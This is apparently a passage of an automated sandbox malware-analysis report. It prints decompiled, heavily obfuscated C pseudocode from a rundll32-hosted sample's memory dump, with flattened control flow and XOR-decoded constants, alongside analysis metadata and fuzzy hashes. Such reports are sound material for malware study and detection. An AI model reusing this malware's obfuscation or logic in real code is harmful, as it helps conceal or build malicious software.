                                                                                                                    								_t424[1] = E0034C631(_t425);
                                                                                                                    								_t382 = 0x95701e8;
                                                                                                                    								goto L1;
                                                                                                                    							} else {
                                                                                                                    								__eflags = _t382 - 0xca0d778;
                                                                                                                    								if(_t382 == 0xca0d778) {
                                                                                                                    									E00340DAF(_v64,  &_v40, _v168,  *_t425, _v72, _v128);
                                                                                                                    									_t428 = _t428 + 0x10;
                                                                                                                    									_t382 = 0xa84b454;
                                                                                                                    									goto L1;
                                                                                                                    								} else {
                                                                                                                    									__eflags = _t382 - 0xfa9ed0f;
                                                                                                                    									if(_t382 != 0xfa9ed0f) {
                                                                                                                    										goto L24;
                                                                                                                    									} else {
                                                                                                                    										E00340DAF(_v80,  &_v40, _v88,  *((intOrPtr*)(_t425 + 0x30)), _v136, _v96);
                                                                                                                    										_t428 = _t428 + 0x10;
                                                                                                                    										_t382 = 0x73dcb22;
                                                                                                                    										goto L1;
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					goto L27;
                                                                                                                    					L24:
                                                                                                                    					__eflags = _t382 - 0xd4a25d5;
                                                                                                                    				} while (__eflags != 0);
                                                                                                                    				goto L27;
                                                                                                                    			}























































                                                                                                                    0x00332758
                                                                                                                    0x0033275d
                                                                                                                    0x00332763
                                                                                                                    0x00332769
                                                                                                                    0x00000000
                                                                                                                    0x00332769
                                                                                                                    0x00332763
                                                                                                                    0x00332741
                                                                                                                    0x00332739
                                                                                                                    0x00332731
                                                                                                                    0x00332725
                                                                                                                    0x00332719
                                                                                                                    0x0033293e
                                                                                                                    0x00332940
                                                                                                                    0x00332945
                                                                                                                    0x00332945
                                                                                                                    0x0033294f
                                                                                                                    0x0033294f
                                                                                                                    0x0033283c
                                                                                                                    0x00332842
                                                                                                                    0x003328fd
                                                                                                                    0x00332902
                                                                                                                    0x00332905
                                                                                                                    0x00000000
                                                                                                                    0x00332848
                                                                                                                    0x00332848
                                                                                                                    0x0033284e
                                                                                                                    0x00332936
                                                                                                                    0x00332854
                                                                                                                    0x00332854
                                                                                                                    0x00332856
                                                                                                                    0x003328d3
                                                                                                                    0x003328d6
                                                                                                                    0x00000000
                                                                                                                    0x00332858
                                                                                                                    0x00332858
                                                                                                                    0x0033285e
                                                                                                                    0x003328ba
                                                                                                                    0x003328bf
                                                                                                                    0x003328c2
                                                                                                                    0x00000000
                                                                                                                    0x00332860
                                                                                                                    0x00332860
                                                                                                                    0x00332866
                                                                                                                    0x00000000
                                                                                                                    0x0033286c
                                                                                                                    0x00332889
                                                                                                                    0x0033288e
                                                                                                                    0x00332891
                                                                                                                    0x00000000
                                                                                                                    0x00332891
                                                                                                                    0x00332866
                                                                                                                    0x0033285e
                                                                                                                    0x00332856
                                                                                                                    0x0033284e
                                                                                                                    0x00000000
                                                                                                                    0x0033290a
                                                                                                                    0x0033290a
                                                                                                                    0x0033290a
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: !B {$#8$)e$3{$N<@$R2G$d[$e.($nx~$nx~$e
                                                                                                                    • API String ID: 0-245365489
                                                                                                                    • Opcode ID: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                    • Instruction ID: b835a220d360ca1ada15c269ce706b9bf4702a394f4bcb14f8181e1e438c767f
                                                                                                                    • Opcode Fuzzy Hash: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                    • Instruction Fuzzy Hash: 4AF130B15083809FD369CF61C48AA5BFBE1FBD4348F10891DF29A8A261D7B59958CF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E00339714(void* __ecx, void* __edx) {
                                                                                                                    				signed int _v4;
                                                                                                                    				intOrPtr _v8;
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				void* _t251;
                                                                                                                    				intOrPtr _t252;
                                                                                                                    				intOrPtr _t253;
                                                                                                                    				void* _t257;
                                                                                                                    				signed int _t259;
                                                                                                                    				signed int _t260;
                                                                                                                    				signed int _t261;
                                                                                                                    				signed int _t262;
                                                                                                                    				signed int _t263;
                                                                                                                    				signed int _t264;
                                                                                                                    				void* _t292;
                                                                                                                    				void* _t293;
                                                                                                                    				signed int* _t296;
                                                                                                                    				signed int* _t297;
                                                                                                                    
                                                                                                                    				_t296 =  &_v104;
                                                                                                                    				_v4 = _v4 & 0x00000000;
                                                                                                                    				_v12 = 0xc5b764;
                                                                                                                    				_v8 = 0xb6da07;
                                                                                                                    				_v100 = 0x6b81aa;
                                                                                                                    				_v100 = _v100 ^ 0x5133456b;
                                                                                                                    				_t8 =  &_v100; // 0x5133456b
                                                                                                                    				_v100 =  *_t8 * 0x6e;
                                                                                                                    				_t292 = __edx;
                                                                                                                    				_v100 = _v100 << 0xa;
                                                                                                                    				_v100 = _v100 ^ 0x922ec96f;
                                                                                                                    				_t257 = __ecx;
                                                                                                                    				_v20 = 0x2c208b;
                                                                                                                    				_t293 = 0x52ffaa2;
                                                                                                                    				_v20 = _v20 + 0xffff37e6;
                                                                                                                    				_v20 = _v20 ^ 0x00212911;
                                                                                                                    				_v60 = 0xb21c01;
                                                                                                                    				_v60 = _v60 ^ 0x31980a41;
                                                                                                                    				_v60 = _v60 + 0xffff033c;
                                                                                                                    				_v60 = _v60 ^ 0x31255444;
                                                                                                                    				_v64 = 0x612501;
                                                                                                                    				_v64 = _v64 << 2;
                                                                                                                    				_v64 = _v64 + 0xf44;
                                                                                                                    				_v64 = _v64 ^ 0x018d6347;
                                                                                                                    				_v52 = 0x111460;
                                                                                                                    				_v52 = _v52 + 0xffffc2ff;
                                                                                                                    				_v52 = _v52 | 0x8d441097;
                                                                                                                    				_v52 = _v52 ^ 0x8d5fe5cb;
                                                                                                                    				_v56 = 0xb6e38a;
                                                                                                                    				_t259 = 0x67;
                                                                                                                    				_v56 = _v56 / _t259;
                                                                                                                    				_t260 = 0x41;
                                                                                                                    				_v56 = _v56 * 0x32;
                                                                                                                    				_v56 = _v56 ^ 0x00536033;
                                                                                                                    				_v96 = 0xaa1e09;
                                                                                                                    				_v96 = _v96 / _t260;
                                                                                                                    				_t261 = 0x73;
                                                                                                                    				_v96 = _v96 * 0xd;
                                                                                                                    				_v96 = _v96 / _t261;
                                                                                                                    				_v96 = _v96 ^ 0x00047537;
                                                                                                                    				_v88 = 0xebbfc;
                                                                                                                    				_v88 = _v88 << 7;
                                                                                                                    				_v88 = _v88 | 0x3053ba58;
                                                                                                                    				_t262 = 0x7f;
                                                                                                                    				_v88 = _v88 / _t262;
                                                                                                                    				_v88 = _v88 ^ 0x006c206b;
                                                                                                                    				_v44 = 0xece271;
                                                                                                                    				_v44 = _v44 + 0xffff86ef;
                                                                                                                    				_v44 = _v44 + 0x6a70;
                                                                                                                    				_v44 = _v44 ^ 0x00eb9b45;
                                                                                                                    				_v48 = 0xd70038;
                                                                                                                    				_v48 = _v48 | 0x378b661e;
                                                                                                                    				_v48 = _v48 ^ 0xfc23f8e2;
                                                                                                                    				_v48 = _v48 ^ 0xcbf8b4c1;
                                                                                                                    				_v92 = 0x86f3ef;
                                                                                                                    				_v92 = _v92 << 0xd;
                                                                                                                    				_v92 = _v92 >> 0xd;
                                                                                                                    				_v92 = _v92 + 0x4513;
                                                                                                                    				_v92 = _v92 ^ 0x000ef1b6;
                                                                                                                    				_v80 = 0x7a204;
                                                                                                                    				_v80 = _v80 + 0xffffa60a;
                                                                                                                    				_v80 = _v80 | 0x4d150135;
                                                                                                                    				_v80 = _v80 + 0xffff9d32;
                                                                                                                    				_v80 = _v80 ^ 0x4d179d3b;
                                                                                                                    				_v40 = 0x124198;
                                                                                                                    				_v40 = _v40 ^ 0x5335feb3;
                                                                                                                    				_t263 = 0x78;
                                                                                                                    				_v40 = _v40 * 0x18;
                                                                                                                    				_v40 = _v40 ^ 0xcbb00a78;
                                                                                                                    				_v84 = 0xcaa24a;
                                                                                                                    				_v84 = _v84 * 0x42;
                                                                                                                    				_v84 = _v84 ^ 0x45be5790;
                                                                                                                    				_v84 = _v84 + 0xffff0d2f;
                                                                                                                    				_v84 = _v84 ^ 0x718e360f;
                                                                                                                    				_v24 = 0x4d7038;
                                                                                                                    				_v24 = _v24 | 0x28b75b7a;
                                                                                                                    				_v24 = _v24 ^ 0x28f4655f;
                                                                                                                    				_v28 = 0x844762;
                                                                                                                    				_v28 = _v28 ^ 0xe0e1df8a;
                                                                                                                    				_v28 = _v28 ^ 0xe064bc9e;
                                                                                                                    				_v32 = 0xfc2930;
                                                                                                                    				_v32 = _v32 / _t263;
                                                                                                                    				_v32 = _v32 ^ 0x00028374;
                                                                                                                    				_v104 = 0xce3f74;
                                                                                                                    				_v104 = _v104 + 0x3224;
                                                                                                                    				_v104 = _v104 + 0x85ca;
                                                                                                                    				_t264 = 0xe;
                                                                                                                    				_v104 = _v104 / _t264;
                                                                                                                    				_v104 = _v104 ^ 0x0007887d;
                                                                                                                    				_v68 = 0x11fdc1;
                                                                                                                    				_v68 = _v68 | 0x0fd109af;
                                                                                                                    				_t265 = 0x52;
                                                                                                                    				_v68 = _v68 / _t265;
                                                                                                                    				_v68 = _v68 ^ 0x00367c27;
                                                                                                                    				_v72 = 0xa9a7e;
                                                                                                                    				_v72 = _v72 * 0x16;
                                                                                                                    				_v72 = _v72 ^ 0xca0bce5f;
                                                                                                                    				_v72 = _v72 ^ 0xcae4b7d2;
                                                                                                                    				_v76 = 0xb2d6c0;
                                                                                                                    				_v76 = _v76 + 0xffff5dcd;
                                                                                                                    				_v76 = _v76 >> 0xe;
                                                                                                                    				_v76 = _v76 >> 4;
                                                                                                                    				_v76 = _v76 ^ 0x0002e66e;
                                                                                                                    				_v16 = 0x41627;
                                                                                                                    				_v16 = _v16 + 0xccf7;
                                                                                                                    				_v16 = _v16 ^ 0x00091dff;
                                                                                                                    				_v36 = 0xd94625;
                                                                                                                    				_v36 = _v36 + 0x741;
                                                                                                                    				_v36 = _v36 << 0x10;
                                                                                                                    				_v36 = _v36 ^ 0x4d68793e;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					_t251 = 0xc3f018b;
                                                                                                                    					do {
                                                                                                                    						L2:
                                                                                                                    						while(_t293 != 0x52ffaa2) {
                                                                                                                    							if(_t293 == 0x865547f) {
                                                                                                                    								_t265 = _v80;
                                                                                                                    								_t252 = E0033CDAE(_v80, _v40, _v84,  *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                    								_t296 =  &(_t296[2]);
                                                                                                                    								 *((intOrPtr*)(_t292 + 0x1c)) = _t252;
                                                                                                                    								__eflags = _t252;
                                                                                                                    								_t251 = 0xc3f018b;
                                                                                                                    								_t293 =  !=  ? 0xc3f018b : 0xb7a2405;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    							if(_t293 == 0xb133873) {
                                                                                                                    								_push(_v64);
                                                                                                                    								_t253 = E0034C3A0(_t257, _v100, __eflags, _v20, _v60, _t265);
                                                                                                                    								_t297 =  &(_t296[4]);
                                                                                                                    								 *((intOrPtr*)(_t292 + 0x38)) = _t253;
                                                                                                                    								__eflags = _t253;
                                                                                                                    								if(_t253 != 0) {
                                                                                                                    									E00337B8B( *((intOrPtr*)(_t292 + 0x38)), _v52,  *((intOrPtr*)(_t292 + 0x38)), _v56, _v96);
                                                                                                                    									_push( *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                    									_push(_v92);
                                                                                                                    									_push(_v48);
                                                                                                                    									_t265 = _v88;
                                                                                                                    									E00337C37(_v88, _v44);
                                                                                                                    									_t296 =  &(_t297[6]);
                                                                                                                    									_t293 = 0x865547f;
                                                                                                                    									goto L1;
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								if(_t293 == 0xb7a2405) {
                                                                                                                    									return E00349E56(_v76, _v16, _v36,  *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                    								}
                                                                                                                    								if(_t293 != _t251) {
                                                                                                                    									goto L13;
                                                                                                                    								} else {
                                                                                                                    									_t253 = E003346BE(_t265, _v24, _t265, _v28, _t265, _v32, _v104, _v68, _t265, _t292, E0033219A, _v72);
                                                                                                                    									_t296 =  &(_t296[0xa]);
                                                                                                                    									 *((intOrPtr*)(_t292 + 0x2c)) = _t253;
                                                                                                                    									if(_t253 == 0) {
                                                                                                                    										_t293 = 0xb7a2405;
                                                                                                                    										while(1) {
                                                                                                                    											L1:
                                                                                                                    											_t251 = 0xc3f018b;
                                                                                                                    											goto L2;
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							return _t253;
                                                                                                                    						}
                                                                                                                    						_t293 = 0xb133873;
                                                                                                                    						L13:
                                                                                                                    						__eflags = _t293 - 0x1aeb2e;
                                                                                                                    					} while (__eflags != 0);
                                                                                                                    					return _t251;
                                                                                                                    				}
                                                                                                                    			}












































                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $2$'|6$3`S$8$8pM$>yhM$DT%1$k l$kE3Q$pj$q
                                                                                                                    • API String ID: 0-1622084174
                                                                                                                    • Opcode ID: 8c0b32bf0257b242babe0bbf8338a302490777a0f6591e962819a4b8198b756f
                                                                                                                    • Instruction ID: 2ac700697f6fb34236c619c65c80030a4c276efd7227bcdadf3bf8ab7f2d00c7
                                                                                                                    • Opcode Fuzzy Hash: 8c0b32bf0257b242babe0bbf8338a302490777a0f6591e962819a4b8198b756f
                                                                                                                    • Instruction Fuzzy Hash: 72B12FB2908341DFC358CF25D58A90BFBF1BB84758F408A1DF59A96220D3B5D959CF82
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E003364E2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                    				char _v260;
                                                                                                                    				signed int _v264;
                                                                                                                    				intOrPtr _v268;
                                                                                                                    				char _v276;
                                                                                                                    				signed int _v280;
                                                                                                                    				signed int _v284;
                                                                                                                    				signed int _v288;
                                                                                                                    				signed int _v292;
                                                                                                                    				signed int _v296;
                                                                                                                    				signed int _v300;
                                                                                                                    				signed int _v304;
                                                                                                                    				signed int _v308;
                                                                                                                    				signed int _v312;
                                                                                                                    				signed int _v316;
                                                                                                                    				signed int _v320;
                                                                                                                    				signed int _v324;
                                                                                                                    				signed int _v328;
                                                                                                                    				signed int _v332;
                                                                                                                    				signed int _v336;
                                                                                                                    				signed int _v340;
                                                                                                                    				signed int _v344;
                                                                                                                    				signed int _v348;
                                                                                                                    				signed int _v352;
                                                                                                                    				signed int _v356;
                                                                                                                    				signed int _v360;
                                                                                                                    				signed int _v364;
                                                                                                                    				signed int _v368;
                                                                                                                    				signed int _v372;
                                                                                                                    				signed int _v376;
                                                                                                                    				signed int _v380;
                                                                                                                    				signed int _v384;
                                                                                                                    				signed int _v388;
                                                                                                                    				signed int _v392;
                                                                                                                    				signed int _v396;
                                                                                                                    				signed int _v400;
                                                                                                                    				signed int _v404;
                                                                                                                    				signed int _v408;
                                                                                                                    				signed int _v412;
                                                                                                                    				void* _t311;
                                                                                                                    				void* _t332;
                                                                                                                    				intOrPtr _t335;
                                                                                                                    				intOrPtr _t338;
                                                                                                                    				intOrPtr _t343;
                                                                                                                    				void* _t345;
                                                                                                                    				void* _t347;
                                                                                                                    				void* _t349;
                                                                                                                    				void* _t352;
                                                                                                                    				intOrPtr _t359;
                                                                                                                    				intOrPtr _t361;
                                                                                                                    				intOrPtr* _t362;
                                                                                                                    				intOrPtr _t364;
                                                                                                                    				signed int _t367;
                                                                                                                    				intOrPtr _t386;
                                                                                                                    				intOrPtr _t387;
                                                                                                                    				intOrPtr _t413;
                                                                                                                    				signed int _t414;
                                                                                                                    				signed int _t415;
                                                                                                                    				signed int _t416;
                                                                                                                    				signed int _t417;
                                                                                                                    				signed int _t418;
                                                                                                                    				signed int _t419;
                                                                                                                    				signed int _t420;
                                                                                                                    				signed int _t421;
                                                                                                                    				signed int _t422;
                                                                                                                    				void* _t423;
                                                                                                                    				signed int* _t425;
                                                                                                                    				void* _t427;
                                                                                                                    
                                                                                                                    				_push(_a24);
                                                                                                                    				_t423 = __edx;
                                                                                                                    				_push(_a20);
                                                                                                                    				_push(_a16);
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t311);
                                                                                                                    				_v264 = _v264 & 0x00000000;
                                                                                                                    				_t425 =  &(( &_v412)[8]);
                                                                                                                    				_v268 = 0x38f10b;
                                                                                                                    				_v376 = 0x1d6e4;
                                                                                                                    				_t364 = 0;
                                                                                                                    				_v376 = _v376 + 0x2cf5;
                                                                                                                    				_t367 = 0x349a1a2;
                                                                                                                    				_v376 = _v376 + 0xffffbc4f;
                                                                                                                    				_v376 = _v376 + 0xc828;
                                                                                                                    				_v376 = _v376 ^ 0x000c4abe;
                                                                                                                    				_v344 = 0xf0b614;
                                                                                                                    				_t415 = 0x49;
                                                                                                                    				_v344 = _v344 / _t415;
                                                                                                                    				_v344 = _v344 ^ 0x0006b22b;
                                                                                                                    				_v296 = 0xc48c2;
                                                                                                                    				_v296 = _v296 >> 0xa;
                                                                                                                    				_v296 = _v296 ^ 0x0001ad51;
                                                                                                                    				_v384 = 0x7feda9;
                                                                                                                    				_t416 = 0x39;
                                                                                                                    				_v384 = _v384 * 0x1a;
                                                                                                                    				_v384 = _v384 ^ 0x3da8c069;
                                                                                                                    				_v384 = _v384 + 0xffff691b;
                                                                                                                    				_v384 = _v384 ^ 0x315a0b75;
                                                                                                                    				_v400 = 0x77d138;
                                                                                                                    				_v400 = _v400 + 0xffff5a87;
                                                                                                                    				_v400 = _v400 << 3;
                                                                                                                    				_v400 = _v400 + 0xffff9ef2;
                                                                                                                    				_v400 = _v400 ^ 0x03bdd381;
                                                                                                                    				_v312 = 0x267902;
                                                                                                                    				_v312 = _v312 | 0xf93e454e;
                                                                                                                    				_v312 = _v312 ^ 0xf93fe769;
                                                                                                                    				_v308 = 0x6d5338;
                                                                                                                    				_v308 = _v308 ^ 0x3f4c4be5;
                                                                                                                    				_v308 = _v308 ^ 0x3f211e75;
                                                                                                                    				_v328 = 0x5e1da9;
                                                                                                                    				_v328 = _v328 / _t416;
                                                                                                                    				_v328 = _v328 ^ 0x000cc368;
                                                                                                                    				_v364 = 0xd2dbf2;
                                                                                                                    				_v364 = _v364 + 0xffffefaa;
                                                                                                                    				_v364 = _v364 + 0xd543;
                                                                                                                    				_v364 = _v364 ^ 0x00d6d9fb;
                                                                                                                    				_v304 = 0x235f1e;
                                                                                                                    				_t417 = 0x2e;
                                                                                                                    				_v304 = _v304 / _t417;
                                                                                                                    				_v304 = _v304 ^ 0x000b3ded;
                                                                                                                    				_v320 = 0xc8231f;
                                                                                                                    				_v320 = _v320 << 0xc;
                                                                                                                    				_v320 = _v320 ^ 0x8237c00a;
                                                                                                                    				_v356 = 0xee2c9b;
                                                                                                                    				_v356 = _v356 ^ 0xa0da06c4;
                                                                                                                    				_v356 = _v356 ^ 0xf246f640;
                                                                                                                    				_v356 = _v356 ^ 0x52703357;
                                                                                                                    				_v412 = 0xc100a3;
                                                                                                                    				_v412 = _v412 ^ 0xb8e7c080;
                                                                                                                    				_v412 = _v412 ^ 0xb6721a67;
                                                                                                                    				_v412 = _v412 ^ 0xff44de7f;
                                                                                                                    				_v412 = _v412 ^ 0xf11e2702;
                                                                                                                    				_v396 = 0xa6af25;
                                                                                                                    				_v396 = _v396 << 0x10;
                                                                                                                    				_v396 = _v396 >> 7;
                                                                                                                    				_v396 = _v396 + 0xffff7054;
                                                                                                                    				_v396 = _v396 ^ 0x015ec427;
                                                                                                                    				_v404 = 0x1f48c8;
                                                                                                                    				_t418 = 0x2d;
                                                                                                                    				_v404 = _v404 / _t418;
                                                                                                                    				_v404 = _v404 << 0xb;
                                                                                                                    				_v404 = _v404 | 0x7455ca98;
                                                                                                                    				_v404 = _v404 ^ 0x75da0b0a;
                                                                                                                    				_v368 = 0x174318;
                                                                                                                    				_v368 = _v368 + 0x805d;
                                                                                                                    				_v368 = _v368 ^ 0x0012ca04;
                                                                                                                    				_v408 = 0x579c92;
                                                                                                                    				_t419 = 0x65;
                                                                                                                    				_v408 = _v408 * 0x61;
                                                                                                                    				_v408 = _v408 ^ 0x6a2d4e62;
                                                                                                                    				_v408 = _v408 + 0xd9d0;
                                                                                                                    				_v408 = _v408 ^ 0x4b1c9053;
                                                                                                                    				_v392 = 0x2598b2;
                                                                                                                    				_v392 = _v392 * 0xd;
                                                                                                                    				_v392 = _v392 ^ 0xb79fc0d8;
                                                                                                                    				_v392 = _v392 + 0xffff9085;
                                                                                                                    				_v392 = _v392 ^ 0xb671271d;
                                                                                                                    				_v324 = 0x8734;
                                                                                                                    				_v324 = _v324 + 0xffff82f4;
                                                                                                                    				_v324 = _v324 ^ 0x000c0e93;
                                                                                                                    				_v332 = 0x81f499;
                                                                                                                    				_v332 = _v332 ^ 0xcb023f28;
                                                                                                                    				_v332 = _v332 ^ 0xcb8aeffa;
                                                                                                                    				_v340 = 0xbb3951;
                                                                                                                    				_v340 = _v340 ^ 0x050a1ed9;
                                                                                                                    				_v340 = _v340 ^ 0x05b74055;
                                                                                                                    				_v372 = 0x5c4d3f;
                                                                                                                    				_v372 = _v372 + 0xffffba18;
                                                                                                                    				_v372 = _v372 | 0xc0b40c25;
                                                                                                                    				_v372 = _v372 >> 3;
                                                                                                                    				_v372 = _v372 ^ 0x1815f0ae;
                                                                                                                    				_v380 = 0xe44e59;
                                                                                                                    				_v380 = _v380 + 0x7d25;
                                                                                                                    				_v380 = _v380 + 0xffff00c0;
                                                                                                                    				_v380 = _v380 << 0xa;
                                                                                                                    				_v380 = _v380 ^ 0x8f30862d;
                                                                                                                    				_v360 = 0x1cbdf;
                                                                                                                    				_v360 = _v360 + 0xffff6e4b;
                                                                                                                    				_v360 = _v360 >> 8;
                                                                                                                    				_v360 = _v360 ^ 0x0001cec6;
                                                                                                                    				_v348 = 0xf4499d;
                                                                                                                    				_v348 = _v348 + 0x832d;
                                                                                                                    				_v348 = _v348 << 2;
                                                                                                                    				_v348 = _v348 ^ 0x03dc7480;
                                                                                                                    				_v352 = 0x4c1d4a;
                                                                                                                    				_v352 = _v352 >> 0xd;
                                                                                                                    				_v352 = _v352 * 0xe;
                                                                                                                    				_v352 = _v352 ^ 0x0003e302;
                                                                                                                    				_v388 = 0x7e89b7;
                                                                                                                    				_v388 = _v388 / _t419;
                                                                                                                    				_t420 = 0x48;
                                                                                                                    				_v388 = _v388 / _t420;
                                                                                                                    				_t421 = 0x2b;
                                                                                                                    				_t414 = _v368;
                                                                                                                    				_v388 = _v388 / _t421;
                                                                                                                    				_v388 = _v388 ^ 0x000ed69e;
                                                                                                                    				_t422 = _v368;
                                                                                                                    				_v300 = 0xe9da01;
                                                                                                                    				_v300 = _v300 + 0xffffd878;
                                                                                                                    				_v300 = _v300 ^ 0x00eb5be0;
                                                                                                                    				_v336 = 0x6aaf6d;
                                                                                                                    				_v336 = _v336 * 0x22;
                                                                                                                    				_v336 = _v336 ^ 0x0e2b42a4;
                                                                                                                    				_v316 = 0x54d710;
                                                                                                                    				_v316 = _v316 >> 0xc;
                                                                                                                    				_v316 = _v316 ^ 0x0000014d;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					_t332 = 0x61250f6;
                                                                                                                    					do {
                                                                                                                    						while(1) {
                                                                                                                    							L2:
                                                                                                                    							_t427 = _t367 - _t332;
                                                                                                                    							if(_t427 > 0) {
                                                                                                                    								break;
                                                                                                                    							}
                                                                                                                    							if(_t427 == 0) {
                                                                                                                    								_t352 = E00340AE0(0x40, 1);
                                                                                                                    								_push(_v320);
                                                                                                                    								_push( &_v260);
                                                                                                                    								_push(_t352);
                                                                                                                    								_push(0xb);
                                                                                                                    								E003380E3(_v364, _v304);
                                                                                                                    								_t425 =  &(_t425[6]);
                                                                                                                    								_t367 = 0x97954ea;
                                                                                                                    								while(1) {
                                                                                                                    									L1:
                                                                                                                    									_t332 = 0x61250f6;
                                                                                                                    									goto L2;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							if(_t367 == 0x2db8754) {
                                                                                                                    								E00348519(_v360, _v348, _v292);
                                                                                                                    								E00348519(_v352, _v388, _t422);
                                                                                                                    								E00348519(_v300, _v336, _v284);
                                                                                                                    								_t367 = _t414;
                                                                                                                    								L33:
                                                                                                                    								_t332 = 0x61250f6;
                                                                                                                    								goto L34;
                                                                                                                    							}
                                                                                                                    							if(_t367 == 0x349a1a2) {
                                                                                                                    								_t422 = 0;
                                                                                                                    								E00334B61( &_v260, 0x100, _v376, _v344);
                                                                                                                    								_v284 = _v284 & 0;
                                                                                                                    								_v280 = _v280 & 0;
                                                                                                                    								_v292 = _v292 & 0;
                                                                                                                    								_v288 = _v288 & 0;
                                                                                                                    								_t367 = 0xea9523f;
                                                                                                                    								while(1) {
                                                                                                                    									L1:
                                                                                                                    									_t332 = 0x61250f6;
                                                                                                                    									goto L2;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							if(_t367 == 0x47b49b8) {
                                                                                                                    								if(_v288 >= _v316) {
                                                                                                                    									_t359 = E0034F435( &_v292,  &_v284);
                                                                                                                    								} else {
                                                                                                                    									_t359 = E0034A666( &_v292);
                                                                                                                    								}
                                                                                                                    								_t422 = _t359;
                                                                                                                    								_t332 = 0x61250f6;
                                                                                                                    								_t367 =  !=  ? 0x61250f6 : 0x2db8754;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    							if(_t367 != 0x54d1846) {
                                                                                                                    								goto L34;
                                                                                                                    							}
                                                                                                                    							_t386 =  *0x353e08; // 0x0
                                                                                                                    							_t361 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 4))));
                                                                                                                    							 *((intOrPtr*)(_t386 + 0x14)) =  *((intOrPtr*)(_t386 + 0x14)) + 1;
                                                                                                                    							_t413 =  *((intOrPtr*)(_t386 + 0x14));
                                                                                                                    							 *((intOrPtr*)(_t386 + 4)) = _t361;
                                                                                                                    							if(_t361 == 0) {
                                                                                                                    								 *((intOrPtr*)(_t386 + 4)) =  *((intOrPtr*)(_t386 + 0x20));
                                                                                                                    							}
                                                                                                                    							_t362 =  *0x353e08; // 0x0
                                                                                                                    							if(_t413 >=  *_t362) {
                                                                                                                    								_t387 =  *0x353e08; // 0x0
                                                                                                                    								 *(_t387 + 0x14) =  *(_t387 + 0x14) & 0x00000000;
                                                                                                                    								L37:
                                                                                                                    								return _t364;
                                                                                                                    							} else {
                                                                                                                    								_t367 = 0x349a1a2;
                                                                                                                    								while(1) {
                                                                                                                    									L1:
                                                                                                                    									_t332 = 0x61250f6;
                                                                                                                    									goto L2;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						if(_t367 == 0x70f4b52) {
                                                                                                                    							E00348519(_v372, _v380, _v276);
                                                                                                                    							_t367 = 0x2db8754;
                                                                                                                    							goto L33;
                                                                                                                    						}
                                                                                                                    						if(_t367 == 0x97954ea) {
                                                                                                                    							_t335 =  *0x353e08; // 0x0
                                                                                                                    							_t338 =  *0x353e08; // 0x0
                                                                                                                    							_t343 =  *0x353e08; // 0x0
